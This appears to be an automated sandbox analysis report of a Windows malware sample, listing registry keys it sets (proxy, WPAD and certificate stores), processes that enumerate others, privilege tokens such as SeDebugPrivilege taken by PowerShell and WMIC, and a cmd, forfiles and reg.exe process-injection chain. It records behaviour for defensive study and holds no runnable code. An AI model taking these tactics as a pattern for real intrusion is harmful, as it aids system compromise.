Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\86-4c-c4-c9-44-69\WpadDecisionReason = "1" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0176000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{747B6145-8C5E-4490-B27F-ECACBB08DD56}\WpadDecision = "0" C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\86-4c-c4-c9-44-69\WpadDetectedUrl C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0176000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{747B6145-8C5E-4490-B27F-ECACBB08DD56}\86-4c-c4-c9-44-69 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{747B6145-8C5E-4490-B27F-ECACBB08DD56}\WpadDecisionTime = 002fb51de6bdda01 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{747B6145-8C5E-4490-B27F-ECACBB08DD56}\86-4c-c4-c9-44-69 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\86-4c-c4-c9-44-69 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{747B6145-8C5E-4490-B27F-ECACBB08DD56} C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 2372 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 1680 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2712 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2712 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
